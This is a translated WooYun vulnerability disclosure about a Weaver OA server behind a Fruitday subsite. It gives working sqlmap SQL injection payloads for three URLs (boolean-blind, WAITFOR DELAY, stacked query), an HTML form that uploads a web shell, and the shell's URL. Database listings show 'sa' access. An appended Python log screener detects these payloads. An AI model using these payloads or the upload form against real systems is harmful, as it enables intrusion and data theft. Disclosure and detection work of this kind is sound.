
Vulnerability summary

Defect ID: wooyun-2015-0132002

Title: Multiple SQL injections on a 天天果园 (Fruitday) subsite, plus arbitrary file upload leading to GetShell (II)

Vendor: fruitday.com

Author: 浮萍

Submitted: 2015-08-06 10:10

Fix time: 2015-08-10 19:13

Published: 2015-08-10 19:13

Vulnerability type: SQL injection

Severity: High

Self-assessed Rank: 20

Status: Vendor has been notified but ignored the vulnerability

Source: http://www.wooyun.org. For questions or help, contact [email protected]



Vulnerability details

Disclosure status:

2015-08-06: Details sent to the vendor, awaiting vendor handling
2015-08-10: Vendor actively ignored the vulnerability; details disclosed to the public

Brief description:

Another one.
At least three SQL injection points.
Arbitrary file upload.

Detailed description:

See also http://wooyun.org/bugs/wooyun-2010-0130601
http://210.14.78.115/

(screenshot: 选区_101.png)


Looking at the code shows this is once again a 泛微 (Weaver) system...
Constructing the injection points:
First point: http://210.14.78.115/page/maint/login/Page.jsp?templateId=8&logintype=1&gopage=&message=55

GET parameter 'templateId' is vulnerable. Do you want to keep testing the others (if any)? [y/N] n
sqlmap identified the following injection points with a total of 60 HTTP(s) requests:
---
Parameter: templateId (GET)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: templateId=8 AND 4607=4607&logintype=1&gopage=&message=55
Type: AND/OR time-based blind
Title: Microsoft SQL Server/Sybase time-based blind
Payload: templateId=8 WAITFOR DELAY '0:0:5'&logintype=1&gopage=&message=55
---


web application technology: JSP
back-end DBMS: Microsoft SQL Server 2008


Databases

available databases [8]:
[*] master
[*] model
[*] msdb
[*] oa
[*] ReportServer
[*] ReportServerTempDB
[*] tempdb
[*] TUOYISZWL


current database:    'oa'
current user: 'sa'


Tables in oa:
over a thousand of them, so I did not look through them in detail

(screenshot: 选区_102.png)


Database: TUOYISZWL
[18 tables]
+----------------+
| TuoYi_Admin |
| TuoYi_Content |
| TuoYi_File |
| TuoYi_HR |
| TuoYi_IndexPic |
| TuoYi_Limits |
| TuoYi_Link |
| TuoYi_Log |
| TuoYi_News |
| TuoYi_NewsType |
| TuoYi_Other |
| TuoYi_OtherPic |
| TuoYi_OtherPro |
| TuoYi_PinPai |
| TuoYi_ProPic |
| TuoYi_Project |
| TuoYi_QuYu |
| TuoYi_TopPic |
+----------------+


Proof of vulnerability:

Second point

http://210.14.78.115/weaver/weaver.email.FileDownloadLocation?fileid=39*&download=1


sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Parameter: #1* (URI)
Type: stacked queries
Title: Microsoft SQL Server/Sybase stacked queries (comment)
Payload: http://210.14.78.115:80/weaver/weaver.email.FileDownloadLocation?fileid=39;WAITFOR DELAY '0:0:5'--&download=1
---


Databases

available databases [8]:
[*] master
[*] model
[*] msdb
[*] oa
[*] ReportServer
[*] ReportServerTempDB
[*] tempdb
[*] TUOYISZWL


Third point:

http://210.14.78.115//homepage/LoginHomepage.jsp?hpid=52*&isfromportal=1


URI parameter '#1*' is vulnerable. Do you want to keep testing the others (if any)? [y/N] n
sqlmap identified the following injection points with a total of 115 HTTP(s) requests:
---
Parameter: #1* (URI)
Type: AND/OR time-based blind
Title: Microsoft SQL Server/Sybase time-based blind
Payload: http://210.14.78.115:80//homepage/LoginHomepage.jsp?hpid=52 WAITFOR DELAY '0:0:5'&isfromportal=1
---


Fourth: arbitrary file upload GetShell
Constructed form:

<form method='post' action='http://210.14.78.115/tools/SWFUpload/upload.jsp'  enctype="multipart/form-data" > 
<input type="file" id="file" name="test" style="height:20px;BORDER: #8F908B 1px solid;"/>
<button type=submit value="getshell">getshell</button> </form>


(screenshot: 选区_099.png)


Visit http://210.14.78.115/null1.jsp

(screenshot: 选区_100.png)
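As an added defensive example (not part of the original report), the following Python screener scans web access logs for the three payload shapes sqlmap reported above (boolean tautology, MSSQL WAITFOR DELAY time probe, stacked query) and for POSTs to the upload endpoint; the log lines, client IPs and Common Log Format layout are constructed assumptions.

```python
import re
from urllib.parse import unquote_plus

# Signatures for the payload shapes sqlmap reported on this page: a boolean tautology
# ("AND 4607=4607"), an MSSQL time probe ("WAITFOR DELAY '0:0:5'") and a stacked query (";WAITFOR ... --").
SQLI_PATTERNS = {
    "boolean-blind": re.compile(r"\b(AND|OR)\s+(\d+)\s*=\s*\2\b", re.I),
    "mssql-time-blind": re.compile(r"\bWAITFOR\s+DELAY\s+'[\d:]+'", re.I),
    "stacked-query": re.compile(r";\s*(WAITFOR|EXEC|DECLARE|INSERT|UPDATE|DELETE)\b", re.I),
}
# Upload endpoint named in the report; POSTs to it are worth correlating with a later GET of a new .jsp.
UPLOAD_ENDPOINT = "/tools/SWFUpload/upload.jsp"

# Common Log Format line (assumed layout): ip ident user [time] "METHOD target PROTO" status ...
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+)[^"]*" (?P<status>\d{3})'
)

def classify_request(method, target):
    """Return the detection labels that apply to one request."""
    path, _, query = target.partition("?")
    decoded = unquote_plus(query)  # logs carry %20 / %3D / %27; sqlmap sent spaces and quotes
    labels = [name for name, rx in SQLI_PATTERNS.items() if rx.search(decoded)]
    if method == "POST" and path == UPLOAD_ENDPOINT:
        labels.append("upload-endpoint-post")
    return labels

def scan_log(lines):
    """Return (ip, method, path, labels) for every suspicious request line."""
    findings = []
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue  # skip lines that are not in CLF
        labels = classify_request(m["method"], m["target"])
        if labels:
            findings.append((m["ip"], m["method"], m["target"].partition("?")[0], labels))
    return findings

# Constructed sample lines (not from the report): the three probes above, one upload POST
# and one benign login-page hit, URL-encoded the way a server writes them.
SAMPLE_LOG = [
    '203.0.113.7 - - [06/Aug/2015:10:10:01 +0800] "GET /page/maint/login/Page.jsp?templateId=8%20AND%204607%3D4607&logintype=1&gopage=&message=55 HTTP/1.1" 200 5120',
    '203.0.113.7 - - [06/Aug/2015:10:10:02 +0800] "GET /weaver/weaver.email.FileDownloadLocation?fileid=39%3BWAITFOR%20DELAY%20%270%3A0%3A5%27--&download=1 HTTP/1.1" 200 88',
    '203.0.113.7 - - [06/Aug/2015:10:10:03 +0800] "GET //homepage/LoginHomepage.jsp?hpid=52%20WAITFOR%20DELAY%20%270%3A0%3A5%27&isfromportal=1 HTTP/1.1" 200 4096',
    '203.0.113.7 - - [06/Aug/2015:10:10:04 +0800] "POST /tools/SWFUpload/upload.jsp HTTP/1.1" 200 12',
    '198.51.100.9 - - [06/Aug/2015:10:10:05 +0800] "GET /page/maint/login/Page.jsp?templateId=8&logintype=1&gopage=&message=55 HTTP/1.1" 200 5120',
]
```

Running scan_log(SAMPLE_LOG) reports the first four lines and leaves the benign fifth untouched; the upload POST on its own is only a lead, and needs correlating with a subsequent request for a .jsp that did not previously exist.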


Remediation:

Investigate carefully

Copyright notice: when reposting, credit the source 浮萍@乌云


Vulnerability response

Vendor response:

Severity: No impact, vendor ignored

Ignored at: 2015-08-10 19:13

Vendor reply:

That IP is not a company IP

Latest status:

None yet